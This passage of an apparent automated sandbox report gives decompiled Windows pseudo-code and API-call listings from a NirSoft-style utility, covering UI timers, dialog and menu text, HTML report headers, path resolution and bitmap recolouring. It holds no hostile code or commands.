                                                                                                                                                      							SendMessageW(GetParent( *(_t51 + 0x10)), 0x469, 0, 0);
                                                                                                                                                      							goto L11;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(_a8 == 0) {
                                                                                                                                                      					KillTimer( *(__ecx + 0x10), 0x41);
                                                                                                                                                      					goto L4;
                                                                                                                                                      				}
                                                                                                                                                      				SetTimer( *(__ecx + 0x10), 0x41, 0x64, 0);
                                                                                                                                                      				goto L13;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004038BD
                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004038CD
                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004038DA
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004038F8
                                                                                                                                                      • GetParent.USER32(?), ref: 00403921
                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00403928
                                                                                                                                                      • BeginDeferWindowPos.USER32 ref: 00403936
                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 00403998
                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004039A4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                      • String ID: A
                                                                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                                                                      • Opcode ID: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
                                                                                                                                                      • Instruction ID: 0871a1714dd068d8f738543c02bb6dd68063c1354b3792716d758cdabfe2902c
                                                                                                                                                      • Opcode Fuzzy Hash: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
                                                                                                                                                      • Instruction Fuzzy Hash: 2B315DB1650608BFEB205F60CC86E9ABAADFB04745F00803AF305754E0C7B69E90DA98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 56%
                                                                                                                                                      			E0040D7CE(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                                                                      				void _v514;
                                                                                                                                                      				char _v516;
                                                                                                                                                      				void _v1026;
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				void _v1538;
                                                                                                                                                      				char _v1540;
                                                                                                                                                      				void* _t39;
                                                                                                                                                      				intOrPtr* _t50;
                                                                                                                                                      				void* _t61;
                                                                                                                                                      
                                                                                                                                                      				_t50 = __ecx;
                                                                                                                                                      				_push(0x1fe);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                                                                      					_v1540 = 0;
                                                                                                                                                      					memset( &_v1538, ??, ??);
                                                                                                                                                      					_v1028 = 0;
                                                                                                                                                      					memset( &_v1026, 0, 0x1fe);
                                                                                                                                                      					_v516 = 0;
                                                                                                                                                      					memset( &_v514, 0, 0x1fe);
                                                                                                                                                      					L0040DFD6();
                                                                                                                                                      					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                                                                      					L0040DFD6();
                                                                                                                                                      					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                                                                      					if (_t39 != 0) goto L3;
                                                                                                                                                      					return _t39;
                                                                                                                                                      				}
                                                                                                                                                      				_v516 = 0;
                                                                                                                                                      				memset( &_v514, ??, ??);
                                                                                                                                                      				_v1028 = 0;
                                                                                                                                                      				memset( &_v1026, 0, 0x1fe);
                                                                                                                                                      				L0040DFD6();
                                                                                                                                                      				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                                                                      				L0040DFD6();
                                                                                                                                                      				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40f454, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                                                                      			}













                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                      • Opcode ID: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
                                                                                                                                                      • Instruction ID: bd80c20c5eef5304b465cefa7c525b6dc43605deb3d47911a7a30c53393811c5
                                                                                                                                                      • Opcode Fuzzy Hash: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
                                                                                                                                                      • Instruction Fuzzy Hash: 9F315E71900129AADB20DF95CC85FEB777CFF48304F0044FAB50AB6152E7749A588B69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                      			E00407047(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                                                                      				void _v8202;
                                                                                                                                                      				short _v8204;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      				short _t29;
                                                                                                                                                      				short _t40;
                                                                                                                                                      				void* _t41;
                                                                                                                                                      				struct HMENU__* _t43;
                                                                                                                                                      				short _t50;
                                                                                                                                                      				void* _t52;
                                                                                                                                                      				struct HMENU__* _t59;
                                                                                                                                                      
                                                                                                                                                      				E0040E340(0x2008, __ecx);
                                                                                                                                                      				_t65 = _a8 - 4;
                                                                                                                                                      				if(_a8 != 4) {
                                                                                                                                                      					__eflags = _a8 - 5;
                                                                                                                                                      					if(_a8 == 5) {
                                                                                                                                                      						_t50 =  *0x4131d0; // 0x0
                                                                                                                                                      						__eflags = _t50;
                                                                                                                                                      						if(_t50 == 0) {
                                                                                                                                                      							L8:
                                                                                                                                                      							_push(_a12);
                                                                                                                                                      							_t27 = 5;
                                                                                                                                                      							E00406CC6(_t27);
                                                                                                                                                      							_t29 = CreateDialogParamW(_a4, _a12, 0, E00407042, 0);
                                                                                                                                                      							__eflags = _t29;
                                                                                                                                                      							_a8 = _t29;
                                                                                                                                                      							if(_t29 == 0) {
                                                                                                                                                      								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00407042, 0);
                                                                                                                                                      							}
                                                                                                                                                      							_v8204 = 0;
                                                                                                                                                      							memset( &_v8202, 0, 0x2000);
                                                                                                                                                      							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                                                                      							__eflags = _v8204;
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								E00406DE5(__eflags, L"caption",  &_v8204, 0);
                                                                                                                                                      							}
                                                                                                                                                      							EnumChildWindows(_a8, E00406F88, 0);
                                                                                                                                                      							DestroyWindow(_a8);
                                                                                                                                                      						} else {
                                                                                                                                                      							while(1) {
                                                                                                                                                      								_t40 =  *_t50;
                                                                                                                                                      								__eflags = _t40;
                                                                                                                                                      								if(_t40 == 0) {
                                                                                                                                                      									goto L8;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _t40 - _a12;
                                                                                                                                                      								if(_t40 != _a12) {
                                                                                                                                                      									_t50 = _t50 + 4;
                                                                                                                                                      									__eflags = _t50;
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      								goto L13;
                                                                                                                                                      							}
                                                                                                                                                      							goto L8;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_push(_a12);
                                                                                                                                                      					_t41 = 4;
                                                                                                                                                      					E00406CC6(_t41);
                                                                                                                                                      					_pop(_t52);
                                                                                                                                                      					_t43 = LoadMenuW(_a4, _a12);
                                                                                                                                                      					 *0x412c34 =  *0x412c34 & 0x00000000;
                                                                                                                                                      					_t59 = _t43;
                                                                                                                                                      					_push(1);
                                                                                                                                                      					_push(_t59);
                                                                                                                                                      					_push(_a12);
                                                                                                                                                      					E00406E97(_t52, _t65);
                                                                                                                                                      					DestroyMenu(_t59);
                                                                                                                                                      				}
                                                                                                                                                      				L13:
                                                                                                                                                      				return 1;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • LoadMenuW.USER32 ref: 0040706F
                                                                                                                                                        • Part of subcall function 00406E97: GetMenuItemCount.USER32 ref: 00406EAD
                                                                                                                                                        • Part of subcall function 00406E97: memset.MSVCRT ref: 00406ECC
                                                                                                                                                        • Part of subcall function 00406E97: GetMenuItemInfoW.USER32 ref: 00406F08
                                                                                                                                                        • Part of subcall function 00406E97: wcschr.MSVCRT ref: 00406F20
                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040708D
                                                                                                                                                      • CreateDialogParamW.USER32 ref: 004070E2
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 004070ED
                                                                                                                                                      • CreateDialogParamW.USER32 ref: 004070FA
                                                                                                                                                      • memset.MSVCRT ref: 00407113
                                                                                                                                                      • GetWindowTextW.USER32 ref: 0040712A
                                                                                                                                                      • EnumChildWindows.USER32 ref: 00407157
                                                                                                                                                      • DestroyWindow.USER32(00000005), ref: 00407160
                                                                                                                                                        • Part of subcall function 00406CC6: _snwprintf.MSVCRT ref: 00406CEB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                      • String ID: caption
                                                                                                                                                      • API String ID: 973020956-4135340389
                                                                                                                                                      • Opcode ID: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
                                                                                                                                                      • Instruction ID: 143ff9b161303c46051d95ab40737f9cae21d75e3476d01ba51655d965e5fbc2
                                                                                                                                                      • Opcode Fuzzy Hash: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
                                                                                                                                                      • Instruction Fuzzy Hash: 1131B472504208BFEF219F60DC85EAB3B69FB00314F10847AF909A6191D7759D64CB56
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                      			E00409D04(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				void _v2050;
                                                                                                                                                      				char _v2052;
                                                                                                                                                      				void _v4098;
                                                                                                                                                      				long _v4100;
                                                                                                                                                      				void _v6146;
                                                                                                                                                      				char _v6148;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t43;
                                                                                                                                                      				intOrPtr* _t49;
                                                                                                                                                      				intOrPtr* _t57;
                                                                                                                                                      				void* _t58;
                                                                                                                                                      				void* _t59;
                                                                                                                                                      				intOrPtr _t62;
                                                                                                                                                      				intOrPtr _t63;
                                                                                                                                                      
                                                                                                                                                      				_t49 = __ecx;
                                                                                                                                                      				E0040E340(0x1800, __ecx);
                                                                                                                                                      				_t57 = _t49;
                                                                                                                                                      				E00408857(_t57, _t49, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                                                      				_v4100 = 0;
                                                                                                                                                      				memset( &_v4098, 0, 0x7fe);
                                                                                                                                                      				_v2052 = 0;
                                                                                                                                                      				memset( &_v2050, 0, 0x7fe);
                                                                                                                                                      				_v6148 = 0;
                                                                                                                                                      				memset( &_v6146, 0, 0x7fe);
                                                                                                                                                      				_t59 = _t58 + 0x24;
                                                                                                                                                      				_t62 =  *0x412ed0; // 0x0
                                                                                                                                                      				if(_t62 != 0) {
                                                                                                                                                      					_push(0x412ed0);
                                                                                                                                                      					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                                                                      					_push(0x400);
                                                                                                                                                      					_push( &_v2052);
                                                                                                                                                      					L0040DFD6();
                                                                                                                                                      					_t59 = _t59 + 0x10;
                                                                                                                                                      				}
                                                                                                                                                      				_t63 =  *0x412ecc; // 0x0
                                                                                                                                                      				if(_t63 != 0) {
                                                                                                                                                      					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                                                                      				}
                                                                                                                                                      				E00409130(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                                                                                      				_push( *((intOrPtr*)( *_t57 + 0x94))( *((intOrPtr*)( *_t57 + 0x90))()));
                                                                                                                                                      				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                                                                      				_push(0x400);
                                                                                                                                                      				_push( &_v6148);
                                                                                                                                                      				L0040DFD6();
                                                                                                                                                      				_t43 = E00408857(_t57, _t57, _a4,  &_v6148);
                                                                                                                                                      				_t64 = _a8 - 5;
                                                                                                                                                      				if(_a8 == 5) {
                                                                                                                                                      					return E00409336(_t57, _t64, _a4);
                                                                                                                                                      				}
                                                                                                                                                      				return _t43;
                                                                                                                                                      			}


















                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00409D81
                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00409DA4
                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00409DE6
                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00409D14
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                                                                      • Opcode ID: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
                                                                                                                                                      • Instruction ID: a7c5b093c416f5d9ad8a61283befa58304fd8337d6ea87f6454d28f796e895fe
                                                                                                                                                      • Opcode Fuzzy Hash: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
                                                                                                                                                      • Instruction Fuzzy Hash: 37219172A001186ACB21AB95CC41FEA37BCFF4C345F0440BEF549E3181DB789E948B69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E0040CAF2(wchar_t* __edi, wchar_t* __esi) {
                                                                                                                                                      				void _v526;
                                                                                                                                                      				long _v528;
                                                                                                                                                      				wchar_t* _t17;
                                                                                                                                                      				signed int _t40;
                                                                                                                                                      				wchar_t* _t50;
                                                                                                                                                      
                                                                                                                                                      				_t50 = __edi;
                                                                                                                                                      				if(__esi[0] != 0x3a) {
                                                                                                                                                      					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                                                                                      					if(_t17 == 0) {
                                                                                                                                                      						_t40 = E0040546C(__esi, L"\\systemroot");
                                                                                                                                                      						if(_t40 < 0) {
                                                                                                                                                      							if( *__esi != 0x5c) {
                                                                                                                                                      								wcscpy(__edi, __esi);
                                                                                                                                                      							} else {
                                                                                                                                                      								_v528 = 0;
                                                                                                                                                      								memset( &_v526, 0, 0x208);
                                                                                                                                                      								E004059AA( &_v528);
                                                                                                                                                      								memcpy(__edi,  &_v528, 4);
                                                                                                                                                      								__edi[1] = __edi[1] & 0x00000000;
                                                                                                                                                      								wcscat(__edi, __esi);
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							_v528 = 0;
                                                                                                                                                      							memset( &_v526, 0, 0x208);
                                                                                                                                                      							E004059AA( &_v528);
                                                                                                                                                      							wcscpy(__edi,  &_v528);
                                                                                                                                                      							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                                                                                      						}
                                                                                                                                                      						L11:
                                                                                                                                                      						return _t50;
                                                                                                                                                      					}
                                                                                                                                                      					_push( &(_t17[0]));
                                                                                                                                                      					L4:
                                                                                                                                                      					wcscpy(_t50, ??);
                                                                                                                                                      					goto L11;
                                                                                                                                                      				}
                                                                                                                                                      				_push(__esi);
                                                                                                                                                      				goto L4;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • wcschr.MSVCRT ref: 0040CB0B
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040CB1B
                                                                                                                                                        • Part of subcall function 0040546C: wcslen.MSVCRT ref: 0040547B
                                                                                                                                                        • Part of subcall function 0040546C: wcslen.MSVCRT ref: 00405485
                                                                                                                                                        • Part of subcall function 0040546C: _memicmp.MSVCRT ref: 004054A0
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040CB6A
                                                                                                                                                      • wcscat.MSVCRT ref: 0040CB75
                                                                                                                                                      • memset.MSVCRT ref: 0040CB51
                                                                                                                                                        • Part of subcall function 004059AA: GetWindowsDirectoryW.KERNEL32(004132D0,00000104,?,0040CBAA,?,?,00000000,00000208,00000000), ref: 004059C0
                                                                                                                                                        • Part of subcall function 004059AA: wcscpy.MSVCRT ref: 004059D0
                                                                                                                                                      • memset.MSVCRT ref: 0040CB99
                                                                                                                                                      • memcpy.MSVCRT ref: 0040CBB4
                                                                                                                                                      • wcscat.MSVCRT ref: 0040CBC0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                                                                      • Opcode ID: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
                                                                                                                                                      • Instruction ID: 3f83ceb5217c301b0de1b10fb1ff833d5e9f5f4e9ae752904631e86f644bb4d0
                                                                                                                                                      • Opcode Fuzzy Hash: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
                                                                                                                                                      • Instruction Fuzzy Hash: F821F8B2404314A9D621A7629C87EAB73FC9F04314F20467FB415F20C2FA7C75448B6E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E00402DE1(void* __fp0) {
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				void _v28;
                                                                                                                                                      				void* _v56;
                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                      				void* _v64;
                                                                                                                                                      				void* _v72;
                                                                                                                                                      				void* _v76;
                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                      				long _v88;
                                                                                                                                                      				intOrPtr _v92;
                                                                                                                                                      				int _v96;
                                                                                                                                                      				int _v100;
                                                                                                                                                      				intOrPtr _v104;
                                                                                                                                                      				int _v108;
                                                                                                                                                      				int _v112;
                                                                                                                                                      				intOrPtr _v128;
                                                                                                                                                      				unsigned int _t51;
                                                                                                                                                      				signed char _t52;
                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                      				intOrPtr _t64;
                                                                                                                                                      				struct HDC__* _t75;
                                                                                                                                                      
                                                                                                                                                      				_v56 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				GetObjectW(_v56, 0x18,  &_v28);
                                                                                                                                                      				_t75 = CreateCompatibleDC(0);
                                                                                                                                                      				_v64 = SelectObject(_t75, _v72);
                                                                                                                                                      				_v72 = GetSysColor(0xf);
                                                                                                                                                      				_v88 = GetPixel(_t75, 0, 0);
                                                                                                                                                      				_v96 = 0;
                                                                                                                                                      				if(_v56 > 0) {
                                                                                                                                                      					do {
                                                                                                                                                      						_v100 = 0;
                                                                                                                                                      						if(_v60 > 0) {
                                                                                                                                                      							do {
                                                                                                                                                      								_t51 = GetPixel(_t75, _v100, _v96);
                                                                                                                                                      								if(_t51 != _v100) {
                                                                                                                                                      									_t52 = _t51 & 0x000000ff;
                                                                                                                                                      									_v92 = (_t51 & 0x000000ff) + (_t51 >> 0x00000010 & 0x000000ff) + _t52;
                                                                                                                                                      									asm("fild dword [esp+0x20]");
                                                                                                                                                      									asm("fistp qword [esp+0x28]");
                                                                                                                                                      									_t64 = _v84;
                                                                                                                                                      									_v92 = _t64;
                                                                                                                                                      									asm("fisub dword [esp+0x20]");
                                                                                                                                                      									asm("fldz");
                                                                                                                                                      									asm("fcomp st0, st1");
                                                                                                                                                      									asm("fnstsw ax");
                                                                                                                                                      									if((_t52 & 0x00000041) == 0) {
                                                                                                                                                      										asm("fchs");
                                                                                                                                                      									}
                                                                                                                                                      									asm("fcomp qword [0x410b70]");
                                                                                                                                                      									asm("fnstsw ax");
                                                                                                                                                      									_t53 = _t64 + 1;
                                                                                                                                                      									if((_t52 & 0x00000001) != 0) {
                                                                                                                                                      										_t53 = _t64;
                                                                                                                                                      									}
                                                                                                                                                      									_push(((_t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff);
                                                                                                                                                      								} else {
                                                                                                                                                      									_push(_v96);
                                                                                                                                                      								}
                                                                                                                                                      								SetPixel(_t75, _v112, _v108, ??);
                                                                                                                                                      								_v128 = _v128 + 1;
                                                                                                                                                      							} while (_v128 < _v88);
                                                                                                                                                      						}
                                                                                                                                                      						_v96 = _v96 + 1;
                                                                                                                                                      					} while (_v96 < _v56);
                                                                                                                                                      				}
                                                                                                                                                      				SelectObject(_t75, _v76);
                                                                                                                                                      				DeleteDC(_t75);
                                                                                                                                                      				return _v104;
                                                                                                                                                      			}

























                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
                                                                                                                                                      • LoadImageW.USER32 ref: 00402E01
                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00402E25
                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00402E39
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00402E45
                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00402E83
                                                                                                                                                      • SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00402F2F
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00402F36
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2468767547-0
                                                                                                                                                      • Opcode ID: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
                                                                                                                                                      • Instruction ID: 6edf35894f1bf038c9276b60c95336d8acf92c36c4475dd3a027cf99260808bc
                                                                                                                                                      • Opcode Fuzzy Hash: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
                                                                                                                                                      • Instruction Fuzzy Hash: B9419A71508311ABC7109F60DA4896FBBF8FBC9B51F00493EF585A2291C7789448DBA6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                      			E00405F82() {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				long _v20;
                                                                                                                                                      				long _v24;
                                                                                                                                                      				void* _v28;
                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                      				void _v52;
                                                                                                                                                      				struct HDC__* _t46;
                                                                                                                                                      
                                                                                                                                                      				_v16 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
                                                                                                                                                      				_v52 = 0;
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				asm("stosd");
                                                                                                                                                      				GetObjectW(_v16, 0x18,  &_v52);
                                                                                                                                                      				_t46 = CreateCompatibleDC(0);
                                                                                                                                                      				_v28 = SelectObject(_t46, _v16);
                                                                                                                                                      				_v24 = GetSysColor(0xf);
                                                                                                                                                      				_v20 = GetPixel(_t46, 0, 0);
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				if(_v44 > 0) {
                                                                                                                                                      					do {
                                                                                                                                                      						_v8 = 0;
                                                                                                                                                      						if(_v48 > 0) {
                                                                                                                                                      							do {
                                                                                                                                                      								if(GetPixel(_t46, _v8, _v12) == _v20) {
                                                                                                                                                      									SetPixel(_t46, _v8, _v12, _v24);
                                                                                                                                                      								}
                                                                                                                                                      								_v8 = _v8 + 1;
                                                                                                                                                      							} while (_v8 < _v48);
                                                                                                                                                      						}
                                                                                                                                                      						_v12 = _v12 + 1;
                                                                                                                                                      					} while (_v12 < _v44);
                                                                                                                                                      				}
                                                                                                                                                      				SelectObject(_t46, _v28);
                                                                                                                                                      				DeleteDC(_t46);
                                                                                                                                                      				return _v16;
                                                                                                                                                      			}














                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
                                                                                                                                                      • LoadImageW.USER32 ref: 00405F9F
                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00405FD1
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00405FDC
                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0040600A
